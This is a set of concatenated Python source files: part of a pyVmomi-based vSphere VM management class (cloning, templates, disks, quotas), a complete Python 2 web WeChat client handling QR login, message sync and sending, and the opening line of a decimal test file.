    # NOTE: Can't find equivalent getters in either psphere or suds, so the
    # ServiceInstance 'about' info is used instead.
    about = self.content.about
    return '{} {}'.format(about.apiType, about.apiVersion)
def connect(self):
    # No-op: the service connection is presumably established elsewhere
    # (outside this view) -- kept for interface compatibility.
    pass
def disconnect(self):
    # No-op: teardown is presumably handled elsewhere -- kept for interface
    # compatibility.
    pass
def vm_status(self, vm_name):
    """Return the VM's current power state string (forces a fresh lookup)."""
    vm = self._get_vm(vm_name, force=True)
    return str(vm.runtime.powerState)
def vm_creation_time(self, vm_name):
    """Best-effort creation time: deploy/create event time, else last boot time.

    The vCenter API has no direct creation-date attribute; the closest source
    is the event log filtered to VmDeployedEvent/VmCreatedEvent.

    NOTE(review): the return value is converted with astimezone(pytz.UTC),
    which yields a timezone-AWARE datetime; the original docstring promised
    tz-naive -- confirm which contract callers rely on.
    """
    vm = self._get_vm(vm_name)
    filter_spec = vim.event.EventFilterSpec(
        entity=vim.event.EventFilterSpec.ByEntity(
            entity=vm, recursion=vim.event.EventFilterSpec.RecursionOption.self),
        eventTypeId=['VmDeployedEvent', 'VmCreatedEvent'])
    collector = self.content.eventManager.CreateCollectorForEvents(filter=filter_spec)
    collector.SetCollectorPageSize(1000)  # max allowed value
    events = collector.latestPage
    collector.DestroyCollector()  # limited number of collectors allowed per client
    if events:
        creation_time = events.pop().createdTime  # datetime object
    else:
        # no events found for VM, fallback to last boot time
        creation_time = vm.runtime.bootTime
    if not creation_time:
        raise VMCreationDateError('Could not find a creation date for {}'.format(vm_name))
    # localize to UTC
    return creation_time.astimezone(pytz.UTC)
def get_vm_host_name(self, vm_name):
    """Return the name of the ESXi host currently running the VM."""
    host = self._get_vm(vm_name).runtime.host
    return str(host.name)
def get_vm_datastore_path(self, vm_name, vm_config_datastore):
    """Return the URL of the VM datastore whose name is in vm_config_datastore."""
    vm = self._get_vm(vm_name)
    matches = [
        str(ds.url)
        for ds in vm.config.datastoreUrl
        if ds.name in vm_config_datastore
    ]
    # pop() keeps the original IndexError behavior when nothing matches.
    return matches.pop()
def get_vm_config_files_path(self, vm_name):
    """Return the datastore path of the VM's configuration (.vmx) file."""
    vm = self._get_vm(vm_name)
    return str(vm.config.files.vmPathName)
def in_steady_state(self, vm_name):
    """True when the VM is in a stable power state (on, off or suspended)."""
    steady_states = {self.POWERED_ON, self.POWERED_OFF, self.SUSPENDED}
    return self.vm_status(vm_name) in steady_states
def is_vm_running(self, vm_name):
    """True when the VM is powered on."""
    status = self.vm_status(vm_name)
    return status == self.POWERED_ON
def wait_vm_running(self, vm_name, num_sec=240):
    # Block until the VM reports powered-on; wait_for raises on timeout.
    self.logger.info(" Waiting for vSphere VM %s to change status to ON" % vm_name)
    wait_for(self.is_vm_running, [vm_name], num_sec=num_sec)
def is_vm_stopped(self, vm_name):
    """True when the VM is powered off."""
    status = self.vm_status(vm_name)
    return status == self.POWERED_OFF
def wait_vm_stopped(self, vm_name, num_sec=240):
    # Block until the VM reports powered-off; wait_for raises on timeout.
    self.logger.info(" Waiting for vSphere VM %s to change status to OFF" % vm_name)
    wait_for(self.is_vm_stopped, [vm_name], num_sec=num_sec)
def is_vm_suspended(self, vm_name):
    """True when the VM is suspended."""
    status = self.vm_status(vm_name)
    return status == self.SUSPENDED
def wait_vm_suspended(self, vm_name, num_sec=360):
    # Block until the VM reports suspended; wait_for raises on timeout.
    self.logger.info(" Waiting for vSphere VM %s to change status to SUSPENDED" % vm_name)
    wait_for(self.is_vm_suspended, [vm_name], num_sec=num_sec)
def suspend_vm(self, vm_name):
    """Suspend the VM and wait for it; a powered-off VM cannot be suspended.

    Raises:
        VMInstanceNotSuspended: when the VM is currently stopped.
    """
    self.wait_vm_steady(vm_name)
    self.logger.info(" Suspending vSphere VM %s" % vm_name)
    vm = self._get_vm(vm_name)
    if self.is_vm_stopped(vm_name):
        raise VMInstanceNotSuspended(vm_name)
    vm.SuspendVM_Task()
    self.wait_vm_suspended(vm_name)
    return True
def rename_vm(self, vm_name, new_vm_name):
    # Rename the VM and poll until the new name is visible.
    # Returns the NEW name on success, the OLD name when the task errored.
    vm = self._get_vm(vm_name)
    task = vm.Rename_Task(newName=new_vm_name)
    # Cycle until the new named vm is found
    # That must happen or the error state can come up too
    while not self.does_vm_exist(new_vm_name):
        # Refresh the task object so we see the current state.
        task = self._get_updated_obj(task)
        if task.info.state == "error":
            return vm_name  # Old vm name if error
        time.sleep(0.5)
    else:
        # The newly renamed VM is found (loop exited without error).
        return new_vm_name
@staticmethod
def _progress_log_callback(logger, source, destination, progress):
logger.info("Provisioning progress {}->{}: {}".format(
source, destination, str(progress)))
def _pick_datastore(self, allowed_datastores):
    """Pick the allowed, healthy, multi-host datastore with the most free space."""
    candidates = [
        ds for ds in self._get_obj_list(vim.Datastore)
        if ds.name in allowed_datastores and ds.summary.accessible
        and ds.summary.multipleHostAccess and ds.overallStatus != "red"
    ]
    if not candidates:
        raise Exception("No possible datastores!")
    # Highest free-space ratio wins; ties resolve to the first candidate,
    # matching the original stable descending sort.
    return max(
        candidates,
        key=lambda ds: float(ds.summary.freeSpace) / float(ds.summary.capacity))
def clone_vm(self, source, destination, resourcepool=None, datastore=None, power_on=True,
             sparse=False, template=False, provision_timeout=1800, progress_callback=None,
             allowed_datastores=None, cpu=None, ram=None, **kwargs):
    """Clone a VM.

    Args:
        source: name of the VM/template to clone from.
        destination: name for the clone; must not already exist.
        resourcepool: vim.ResourcePool or a name resolvable by
            _get_resource_pool.
        datastore: datastore name, vim.Datastore, or None for automatic
            selection (restricted to allowed_datastores when given, else the
            source's own datastore).
        power_on: power the clone on after creation.
        sparse: use the sparse relocate transformation instead of flat.
        template: mark the clone as a template.
        provision_timeout: seconds to wait for the clone task.
        progress_callback: callable(text); defaults to logging via
            _progress_log_callback.
        cpu/ram: optional CPU count / memory-MB overrides for the clone.

    Returns:
        destination on success.

    Raises:
        VMInstanceNotCloned: when the clone task does not end in 'success'.
    """
    # Fail early when a VM with the destination name already exists.
    # NOTE(review): the outer except can never fire -- the inner try/except
    # already swallows VMInstanceNotFound.
    try:
        try:
            vm = self._get_vm(vm_name=destination)
        except VMInstanceNotFound:
            vm = None
        if vm:
            raise Exception("VM already present!")
    except VMInstanceNotFound:
        pass
    if progress_callback is None:
        progress_callback = partial(self._progress_log_callback, self.logger,
                                    source, destination)
    source_template = self._get_vm(source)
    vm_clone_spec = vim.VirtualMachineCloneSpec()
    vm_reloc_spec = vim.VirtualMachineRelocateSpec()
    # DATASTORE: explicit name, explicit object, or automatic selection.
    if isinstance(datastore, six.string_types):
        vm_reloc_spec.datastore = self._get_obj(vim.Datastore, name=datastore)
    elif isinstance(datastore, vim.Datastore):
        vm_reloc_spec.datastore = datastore
    elif datastore is None:
        if allowed_datastores is not None:
            # Pick a datastore by space
            vm_reloc_spec.datastore = self._pick_datastore(allowed_datastores)
        else:
            # Use the same datastore as the source
            datastores = source_template.datastore
            if isinstance(datastores, (list, tuple)):
                vm_reloc_spec.datastore = datastores[0]
            else:
                vm_reloc_spec.datastore = datastores
    else:
        raise NotImplementedError("{} not supported for datastore".format(datastore))
    progress_callback("Picked datastore `{}`".format(vm_reloc_spec.datastore.name))
    # RESOURCE POOL
    if isinstance(resourcepool, vim.ResourcePool):
        vm_reloc_spec.pool = resourcepool
    else:
        vm_reloc_spec.pool = self._get_resource_pool(resourcepool)
    progress_callback("Picked resource pool `{}`".format(vm_reloc_spec.pool.name))
    vm_reloc_spec.host = None
    if sparse:
        vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().sparse
    else:
        vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().flat
    vm_clone_spec.powerOn = power_on
    vm_clone_spec.template = template
    vm_clone_spec.location = vm_reloc_spec
    vm_clone_spec.snapshot = None
    # NOTE(review): these assignments assume vm_clone_spec.config is already a
    # ConfigSpec instance -- confirm pyVmomi populates it, otherwise this
    # raises on a None config.
    if cpu is not None:
        vm_clone_spec.config.numCPUs = int(cpu)
    if ram is not None:
        vm_clone_spec.config.memoryMB = int(ram)
    # Place the clone next to the source (grandparent folder when available).
    try:
        folder = source_template.parent.parent.vmParent
    except AttributeError:
        folder = source_template.parent
    progress_callback("Picked folder `{}`".format(folder.name))
    task = source_template.CloneVM_Task(folder=folder, name=destination, spec=vm_clone_spec)

    def _check(store=[task]):
        # The mutable default holds the task so the closure can refresh it
        # in place between polls.
        try:
            if hasattr(store[0].info, 'progress') and store[0].info.progress is not None:
                progress_callback("{}/{}%".format(store[0].info.state, store[0].info.progress))
            else:
                progress_callback("{}".format(store[0].info.state))
        except AttributeError:
            pass
        if store[0].info.state not in {"queued", "running"}:
            return True
        else:
            # Still in flight; fetch a fresh task object for the next poll.
            store[0] = self._get_updated_obj(store[0])
            return False
    wait_for(_check, num_sec=provision_timeout, delay=4)
    if task.info.state != 'success':
        self.logger.error('Clone VM failed: %s', get_task_error_message(task))
        raise VMInstanceNotCloned(source)
    else:
        return destination
def mark_as_template(self, vm_name, **kwargs):
    """Convert the named VM into a template (the API call returns None)."""
    vm = self._get_vm(vm_name)
    vm.MarkAsTemplate()
def deploy_template(self, template, **kwargs):
    """Clone `template` into a real VM named kwargs['vm_name'] and wait for it.

    Honors kwargs['power_on'] (default True) and kwargs['timeout'] (default
    1800 seconds); returns the new VM's name.
    """
    power_on = kwargs.setdefault("power_on", True)
    kwargs["template"] = False  # the result is a VM, never a template
    destination = kwargs.pop("vm_name")
    start_timeout = kwargs.pop("timeout", 1800)
    self.clone_vm(template, destination, **kwargs)
    if power_on:
        self.wait_vm_running(destination, num_sec=start_timeout)
    else:
        self.wait_vm_stopped(destination, num_sec=start_timeout)
    return destination
def remove_host_from_cluster(self, host_name):
    # Disconnect the host first, then destroy its inventory object.
    host = self._get_obj(vim.HostSystem, name=host_name)
    task = host.DisconnectHost_Task()
    # NOTE(review): assumes wait_for(self._task_wait, ...) returns the task's
    # final state string as its first element -- confirm _task_wait's contract.
    status, t = wait_for(self._task_wait, [task])
    if status != 'success':
        raise HostNotRemoved("Host {} not removed: {}".format(
            host_name, get_task_error_message(task)))
    task = host.Destroy_Task()
    status, t = wait_for(self._task_wait, [task], fail_condition=None)
    return status == 'success'
def vm_hardware_configuration(self, vm_name):
    """Return the VM's hardware as {'ram': <MB>, 'cpu': <count>}."""
    hardware = self._get_vm(vm_name).config.hardware
    return {
        'ram': hardware.memoryMB,
        'cpu': hardware.numCPU,
    }
def usage_and_quota(self):
    """Summarize installed host capacity and powered-on VM usage.

    Returns:
        dict with 'ram_used'/'ram_total'/'cpu_used'/'cpu_total' and the
        corresponding '_limit' keys set to None (no quota at this level).
    """
    installed_ram = 0
    installed_cpu = 0
    used_ram = 0
    used_cpu = 0
    # Total capacity: sum over every host in the inventory.
    for host in self._get_obj_list(vim.HostSystem):
        installed_ram += host.systemResources.config.memoryAllocation.limit
        installed_cpu += host.summary.hardware.numCpuCores
    # Fetch name/template for every VM in one property-collector call.
    property_spec = vmodl.query.PropertyCollector.PropertySpec()
    property_spec.all = False
    property_spec.pathSet = ['name', 'config.template']
    # CONSISTENCY FIX: every other collector in this class passes the managed
    # object type, not the bare string 'VirtualMachine'.
    property_spec.type = vim.VirtualMachine
    pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
    object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
    for vm in object_contents:
        vm_props = {p.name: p.val for p in vm.propSet}
        if vm_props.get('config.template'):
            continue  # templates consume no runtime resources
        if vm.obj.summary.runtime.powerState.lower() != 'poweredon':
            continue  # only running VMs count toward usage
        used_ram += vm.obj.summary.config.memorySizeMB
        used_cpu += vm.obj.summary.config.numCpu
    return {
        # RAM
        'ram_used': used_ram,
        'ram_total': installed_ram,
        'ram_limit': None,
        # CPU
        'cpu_used': used_cpu,
        'cpu_total': installed_cpu,
        'cpu_limit': None,
    }
def add_disk_to_vm(self, vm_name, capacity_in_kb, provision_type=None, unit=None):
    """
    Create a disk on the given datastore (by name)

    Community Example used
    https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/add_disk_to_vm.py

    Return task type from Task.result or Task.error
    https://github.com/vmware/pyvmomi/blob/master/docs/vim/TaskInfo.rst

    Args:
        vm_name (string): name of the vm to add disk to
        capacity_in_kb (int): capacity of the new drive in Kilobytes
        provision_type (string): 'thin' or 'thick', will default to thin if invalid option
        unit (int): The unit number of the disk to add, use to override existing disk. Will
            search for next available unit number by default

    Returns:
        (bool, task_result): Tuple containing boolean True if task ended in success,
        and the contents of task.result or task.error depending on state
    """
    provision_type = provision_type if provision_type in ['thick', 'thin'] else 'thin'
    vm = self._get_vm(vm_name=vm_name)
    # If the requested unit matches an existing device's unit, reuse its key.
    key = None
    controller_key = None
    unit_number = None
    virtual_disk_devices = [
        device for device
        in vm.config.hardware.device if isinstance(device, vim.vm.device.VirtualDisk)]
    for dev in virtual_disk_devices:
        if unit == int(dev.unitNumber):
            # user specified unit matching existing disk, match key too
            key = dev.key
        # BUGFIX: the original `unit or int(dev.unitNumber) + 1` treated a
        # requested unit of 0 as "not specified"; compare against None instead.
        unit_number = unit if unit is not None else int(dev.unitNumber) + 1
        if unit_number == 7:  # reserved unit (SCSI controller)
            unit_number += 1
        controller_key = dev.controllerKey
    if not (controller_key or unit_number):
        raise ValueError('Could not identify VirtualDisk device on given vm')
    # create disk backing specification
    backing_spec = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
    backing_spec.diskMode = 'persistent'
    backing_spec.thinProvisioned = (provision_type == 'thin')
    # create disk specification, attaching backing
    disk_spec = vim.vm.device.VirtualDisk()
    disk_spec.backing = backing_spec
    disk_spec.unitNumber = unit_number
    if key:  # only set when overriding existing disk
        disk_spec.key = key
    disk_spec.controllerKey = controller_key
    disk_spec.capacityInKB = capacity_in_kb
    # create device specification, attaching disk
    device_spec = vim.vm.device.VirtualDeviceSpec()
    device_spec.fileOperation = 'create'
    device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
    device_spec.device = disk_spec
    # create vm specification for device changes
    vm_spec = vim.vm.ConfigSpec()
    vm_spec.deviceChange = [device_spec]
    # start vm reconfigure task
    task = vm.ReconfigVM_Task(spec=vm_spec)

    def task_complete(task_obj):
        # NOTE(review): polls the same task object; assumes pyVmomi refreshes
        # task_obj.info on attribute access -- confirm, otherwise re-fetch.
        status = task_obj.info.state
        return status not in ['running', 'queued']

    try:
        wait_for(task_complete, [task])
    except TimedOutError:
        self.logger.exception('Task did not go to success state: {}'.format(task))
    finally:
        if task.info.state == 'success':
            result = (True, task.info.result)
        elif task.info.state == 'error':
            result = (False, task.info.error)
        else:  # shouldn't happen
            result = (None, None)
    return result
|
client.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
import time
import json
import random
import logging
import requests
import threading
import qrcode
from lxml import etree
# Install a default root handler so module loggers emit without extra setup.
logging.basicConfig()

# Built-in/system accounts whose ids are plain names rather than '@...' hashes.
SPECIAL_USERS = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'tmessage',
                 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote',
                 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp',
                 'feedsapp', 'voip', 'blogappweixin', 'weixin', 'brandsessionholder',
                 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts',
                 'wxitil', 'userexperience_alarm', 'notification_messages']
def timestamp():
    """Current wall-clock time as an integer number of microseconds."""
    now = time.time()
    return int(now * 1000000)
def isGroupId(wxid):
    """True when wxid looks like a group id: '@@' prefix, 32-char-multiple tail."""
    if not wxid.startswith('@@'):
        return False
    return (len(wxid) - 2) % 32 == 0
def isContactId(wxid):
    """True when wxid looks like a contact id: '@' prefix plus a tail whose
    length is a multiple of 32.

    BUGFIX: uses a slice instead of wxid[0] so an empty string returns False
    rather than raising IndexError.
    """
    return wxid[:1] == '@' and (len(wxid) - 1) % 32 == 0
class MessageHandler(object):
    """Callback interface for WxClient; subclass and override what you need."""

    def on_login(self, client):
        """Called once the contact list has been fetched."""
        counts = (len(client.special_accounts),
                  len(client.official_accounts),
                  len(client.groups),
                  len(client.contacts))
        print('[+] Initialize done. '
              '{} special accounts, '
              '{} official accounts, '
              '{} groups, '
              '{} persons.'.format(*counts))

    def on_logout(self, client):
        """Called when the server reports that the session has ended."""
        pass

    def on_event(self, client, event):
        """Called for sync/login state changes; event is a short tag string."""
        pass

    def on_message(self, client, message):
        """Called for every incoming message dict."""
        pass
class WxClient(object):
    """Web WeChat client (Python 2): drives the QR-code login handshake and a
    background sync loop, dispatching events/messages to a MessageHandler."""

    def __init__(self, handler=MessageHandler(), loglevel=logging.INFO):
        # NOTE(review): a single shared MessageHandler instance is the default
        # argument, so every WxClient() built without an explicit handler
        # shares that one handler object.
        self.logger = logging.getLogger('WxClient')
        self.logger.setLevel(loglevel)
        self.handler = handler
        # Session credentials, filled in during the login handshake.
        self.uri = ''
        self.base = ''
        self.skey = ''
        self.sid = ''
        self.uin = ''
        self.pass_ticket = ''
        # Random device id in the web-client format: 'e' + 15 digits.
        self.deviceid = 'e' + ''.join([str(random.randint(0,9)) for i in range(15)])
        self.jsonsynckeys = []
        self.session = requests.Session()
        # Contact caches, partitioned by account kind.
        self.special_accounts = []
        self.official_accounts = []
        self.contacts = []
        self.groups = []

    def start_background(self):
        """Run the full QR login handshake, then start the sync loop thread."""
        uuid = self.get_uuid()
        code = self.get_qrcode(uuid)
        self.show_qrcode(code)
        print '[+] Please Scan ...'
        self.wait_scan(uuid)
        print '[+] Please Comfirm ...'
        self.wait_comfirm(uuid)
        print '[+] Initializing ...'
        self.webwxlogin()
        self.webwxinit()
        self.webwxgetcontact()
        #self.webwxbatchgetcontact()
        # Daemon thread so the process can exit while the loop is running.
        loopthread = threading.Thread(target=self.syncloop)
        loopthread.daemon = True
        loopthread.start()

    def syncloop(self):
        """Poll synccheck forever; fetch updates on change, stop on logout."""
        running = True
        while running:
            (retcode, selector) = self.syncheck()
            if retcode == '0':
                if selector == '0':
                    # Nothing new; poll again.
                    self.handler.on_event(self, 'SYN_CHECK_AGAIN')
                    continue
                else:
                    self.handler.on_event(self, 'SYN_CHECK_UPDATE')
                    self.webwxsync()
            elif retcode == '1101':
                # Server says the session is over.
                self.handler.on_logout(self)
                running = False
            else:
                self.handler.on_event(self, 'SYN_CHECK_ERROR {}'.format(retcode))
                running = False

    def get_uuid(self):
        """Request a fresh login uuid; returns '' on failure."""
        uuid = ''
        url = 'https://login.weixin.qq.com/jslogin'
        params = {
            'appid':'wx782c26e4c19acffb',
            'fun':'new',
            'lang':'en_US',
            '_': timestamp()
        }
        response = self.session.post(url, data=params)
        regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
        match = re.search(regx, response.content)
        if match and match.group(1) == '200':
            uuid = match.group(2)
            self.logger.debug('Get uuid:' + uuid)
        else:
            self.logger.warn('Fail to get uuid, response:\n' + response.text)
        return uuid

    def get_qrcode(self, uuid):
        """Build (not render) a QR code wrapping the login URL for this uuid."""
        data = 'https://login.weixin.qq.com/l/' + uuid
        code = qrcode.QRCode(
            version=1,  # Range from 1 to 40, controls the size of qr code, 1 = smallest = 21x21 matrix
            error_correction=qrcode.constants.ERROR_CORRECT_L,
            box_size=10,
            border=4
        )
        code.add_data(data)
        return code

    def show_qrcode(self, code):
        """Display the QR code: PNG viewer on Windows, ASCII art elsewhere."""
        if sys.platform.startswith('win'):
            img = code.make_image()
            imgpath = 'login.png';
            with open(imgpath, 'wb') as f:
                img.save(f, kind='PNG')
            os.startfile(imgpath)
        else:
            code.print_ascii(tty=True)

    def wait_scan(self, uuid):
        """Long-poll until the QR code is scanned; True on code 201."""
        url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip={}&uuid={}&_={}'.format(
            1, uuid, timestamp())
        response = self.session.get(url)
        match = re.search(r'window.code=(\d+);', response.content)
        status = False
        if match:
            code = match.group(1)
            self.logger.debug('Scan response:' + response.content)
            if '201' == code:
                self.handler.on_event(self, 'SCAN_SUCCESS')
                status = True
            elif '408' == code:
                self.handler.on_event(self, 'SCAN_TIMEOUT')
            else:
                self.handler.on_event(self, 'SCAN_ERROR')
        return status

    def wait_comfirm(self, uuid):
        """Long-poll until the user confirms login; True once the redirect
        uri has been parsed (code 200)."""
        url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip={}&uuid={}&_={}'.format(
            0, uuid, timestamp())
        response = self.session.get(url)
        match = re.search(r'window.code=(\d+);', response.content)
        status = False
        if match:
            code = match.group(1)
            self.logger.debug('Comfirm response:' + response.content)
            if '200' == code:
                self.handler.on_event(self, 'COMFIRM_SUCCESS')
                status = self.init_url(response.text)
            elif '408' == code:
                self.handler.on_event(self, 'COMFIRM_TIMEOUT')
            else:
                self.handler.on_event(self, 'COMFIRM_ERROR')
        return status

    def init_url(self, text):
        """Extract the redirect uri from the confirm response; set uri/base."""
        match = re.search(r'window.redirect_uri="(\S+?)";', text)
        status = False
        if match:
            self.uri = match.group(1)
            self.base = self.uri[:self.uri.rfind('/')]
            self.logger.debug('Comfirmed, base={}'.format(self.base))
            self.logger.debug('Comfirmed, uri={}'.format(self.uri))
            status = True
        return status

    def webwxlogin(self):
        """Fetch session credentials (skey/sid/uin/pass_ticket) from the
        redirect uri's XML response; True when all four were obtained."""
        success = True
        url = self.uri + '&fun=new&version=v2'
        response = self.session.get(url)
        if(response.status_code == 200):
            self.logger.debug('login response:' + response.text)
            root = etree.fromstring(response.text)
            for node in root:
                if node.tag == 'skey':
                    self.skey = node.text
                elif node.tag == 'wxsid':
                    self.sid = node.text
                elif node.tag == 'wxuin':
                    self.uin = node.text
                elif node.tag == 'pass_ticket':
                    self.pass_ticket = node.text
                else:
                    pass
            # Any credential left empty means the login failed.
            if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
                success = False
        else:
            success = False
            self.logger.warn('webwxlogin error:{}'.format(response.status_code))
        return success

    def update_contacts(self, clist):
        """Sort each contact dict into the groups/special/official/person caches."""
        for contact in clist:
            uid = contact['UserName']
            nick = contact['NickName']
            remark = contact['RemarkName']
            numMembers = contact['MemberCount']
            vflag = contact['VerifyFlag']
            if uid[0:2] == '@@' and numMembers > 0:
                self._update(self.groups, contact)
            elif uid[0] != '@':
                # Plain-name ids are system/special accounts.
                self._update(self.special_accounts, contact)
            elif vflag != 0 and vflag % 8 == 0:
                self._update(self.official_accounts, contact)
            else:
                self._update(self.contacts, contact)

    def _update(self, cachedlist, element):
        """Replace the cached entry with the same UserName, or append."""
        incache = False
        for i in xrange(0,len(cachedlist)):
            if cachedlist[i]['UserName'] == element['UserName']:
                cachedlist[i] = element
                incache = True
                break
        if not incache:
            cachedlist.append(element)

    def webwxinit(self):
        """Initialize the session: fetch sync keys, own id and first contacts."""
        url = self.base + '/webwxinit?r={}&pass_ticket={}'.format(
            timestamp(), self.pass_ticket)
        params = {
            'BaseRequest': self._getBaseRequest()
        }
        self.logger.debug('webwxinit request:' + url)
        self.logger.debug('webwxinit params:' + str(params))
        response = self.session.post(url, json=params)
        if(response.status_code == 200):
            if self.logger.getEffectiveLevel() <= logging.DEBUG:
                # Dump the raw response for offline debugging.
                dumpfile = 'webwxinit.json'
                with open(dumpfile, 'w') as f:
                    f.write(response.content)
                self.logger.debug('saving webwxinit response to ' + dumpfile)
            rjson = response.json()
            self.jsonsynckeys = rjson['SyncKey']
            self.update_contacts(rjson['ContactList'])
            self.myid = rjson['User']['UserName'].encode('utf-8')
            self.logger.debug('synckeys:' + self._getSyncKeyStr())
        else:
            self.logger.warn('webwxinit error:{}'.format(response.status_code))

    def webwxgetcontact(self):
        """Fetch the full contact list, then notify the handler via on_login."""
        url = self.base + '/webwxgetcontact?lang=en_US&r={}&pass_ticket={}&skey={}'.format(
            timestamp(), self.pass_ticket, self.skey)
        response = self.session.get(url)
        if(response.status_code == 200):
            if self.logger.getEffectiveLevel() <= logging.DEBUG:
                dumpfile = 'webwxgetcontact.json'
                self.logger.debug('saving webwxinit response to ' + dumpfile)
                with open(dumpfile, 'w') as f:
                    f.write(response.content)
            rjson = response.json()
            self.update_contacts(rjson['MemberList'])
            self.handler.on_login(self)
        else:
            self.logger.warn('webwxgetcontact error:{}'.format(response.status_code))

    def webwxbatchgetcontact(self):
        """Batch-fetch group details. Not needed right now; response ignored."""
        url = self.base + '/webwxbatchgetcontact?type=ex&r={}&pass_ticket={}'.format(
            timestamp(), self.pass_ticket)
        params = {
            'BaseRequest': self._getBaseRequest(),
            "Count": len(self.groups),
            "List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.groups]
        }
        response = self.session.post(url, data=params)
        if response.status_code == 200:
            pass

    def syncheck(self):
        """Poll the push server; return (retcode, selector) strings, or
        (-1, -1) when the response could not be parsed."""
        retcode = -1
        selector = -1
        url = 'https://webpush.wx2.qq.com/cgi-bin/mmwebwx-bin/synccheck'
        params = {
            '_': timestamp(),
            'skey': self.skey,
            'sid': self.sid,
            'uin': self.uin,
            'deviceid': self.deviceid,
            'synckey': self._getSyncKeyStr(),
            'r': timestamp()
        }
        response = self.session.get(url, params=params)
        self.logger.debug('syncheck get:' + response.url)
        if(response.status_code == 200):
            regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
            match = re.search(regx, response.content)
            if match:
                retcode = match.group(1)
                selector = match.group(2)
            else:
                self.logger.warn('syncheck response:{}'.format(response.content))
        else:
            self.logger.warn('syncheck error:{}'.format(response.status_code))
        self.logger.debug('retcode:{}, selector:{}'.format(retcode, selector))
        return (retcode, selector)

    def webwxsync(self):
        """Fetch pending updates: dispatch new messages, refresh contacts and
        sync keys."""
        url = self.base + '/webwxsync?sid={}&skey={}&pass_ticket={}'.format(
            self.sid, self.skey, self.pass_ticket)
        params = {
            'BaseRequest': self._getBaseRequest(),
            'SyncKey': self.jsonsynckeys,
            'rr': ~timestamp()
        }
        response = self.session.post(url, json=params)
        self.logger.debug('webwxsync post:' + response.url)
        if response.status_code == 200:
            jresp = response.json()
            if jresp['BaseResponse']['Ret'] == 0:
                self.jsonsynckeys = jresp['SyncKey']
                if jresp['AddMsgCount'] > 0:
                    for msg in jresp['AddMsgList']:
                        self.handler.on_message(self, msg)
                if jresp['ModContactCount'] > 0:
                    self.update_contacts(jresp['ModContactList'])
                if 'SyncKey' in jresp:
                    self.jsonsynckeys = jresp['SyncKey']
            else:
                self.logger.warn('webwxsync repsonse:{}'.format(jresp['BaseResponse']['Ret']))
        else:
            self.logger.warn('webwxsync error:{}'.format(response.status_code))

    def name2id(self, alias):
        """Map a display name (nick or remark) to a wxid; falls back to
        'filehelper' when no cached contact matches."""
        if alias in SPECIAL_USERS:
            return alias
        wxid = 'filehelper'
        for contact in self.groups + self.official_accounts + self.contacts:
            if contact['NickName'].encode('latin1') == alias or contact['RemarkName'].encode('latin1') == alias:
                wxid = contact['UserName']
                break
        return wxid

    def id2name(self, wxid):
        """Map a wxid back to a display name; falls back to the id's first
        six characters when the contact caches miss."""
        name = wxid[:6]
        cacheMissed = True
        if isGroupId(wxid):
            for group in self.groups:
                if group['UserName'] == wxid:
                    name = group['NickName']
                    cacheMissed = False
                    break
        elif isContactId(wxid):
            for contact in self.official_accounts + self.contacts:
                if contact['UserName'] == wxid:
                    # Prefer the user-assigned remark over the nickname.
                    if contact['RemarkName'] != '':
                        name = contact['RemarkName']
                    else:
                        name = contact['NickName']
                    cacheMissed = False
                    break
        elif wxid in SPECIAL_USERS:
            name = wxid
            cacheMissed = False
        if cacheMissed:
            self.logger.debug('Unknow id:{}'.format(wxid))
        return name.encode('latin1')

    def webwxsendmsg(self, wxid, text):
        """Send a plain-text message (Type 1) to the given wxid."""
        url = self.base + '/webwxsendmsg?pass_ticket={}'.format(self.pass_ticket)
        # Client-side message id: microsecond timestamp + one random digit.
        msgid = str(timestamp()) + str(int(random.random() * 10))
        if type(text) == str:
            utext = text.decode('utf-8')
        else:
            utext = text
        params = {
            'BaseRequest': self._getBaseRequest(),
            'Msg': {
                'Type': 1,
                'Content': utext,
                'FromUserName': self.myid,
                'ToUserName': wxid,
                'LocalID': msgid,
                'ClientMsgId': msgid
            }
        }
        headers = {'Content-Type': 'application/json; charset=utf-8'}
        # ensure_ascii=False keeps non-ASCII text intact; encode explicitly.
        data = json.dumps(params,ensure_ascii=False)
        response = self.session.post(url, data=data.encode('utf-8'), headers=headers)
        if response.status_code == 200:
            self.logger.debug('webwxsendmsg response len: {}'.format(len(response.content)))
        else:
            self.logger.warn('webwxsendmsg error {}'.format(response.status_code))

    def webwxlogout(self):
        """Terminate the web session server-side (response is ignored)."""
        url = self.base + '/webwxlogout?sid={}&skey={}&pass_ticket={}'.format(
            self.sid, self.skey, self.pass_ticket)
        self.session.get(url)

    def _getSyncKeyStr(self):
        """Flatten the sync keys into the 'key_val|key_val|...' wire format."""
        return '|'.join([str(kv['Key']) + '_' + str(kv['Val']) for kv in self.jsonsynckeys['List']])

    def _getBaseRequest(self):
        """Return the BaseRequest credential dict sent with every API call."""
        baserequest = {
            'Uin': self.uin,
            'Sid': self.sid,
            'Skey': self.skey,
            'DeviceID': self.deviceid,
        }
        return baserequest
if __name__ == '__main__':
    # Demo entry point: log in, then idle while the daemon sync thread runs.
    client = WxClient()
    try:
        client.start_background()
        while True:
            time.sleep(60)
    except Exception as e:
        # Best-effort logout (also reached on KeyboardInterrupt in Python 2,
        # where it is not a subclass split like in Python 3 -- it still is a
        # subclass of Exception there? NOTE(review): KeyboardInterrupt is NOT
        # caught here; Ctrl-C will skip the logout).
        client.webwxlogout()
        print str(e)
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
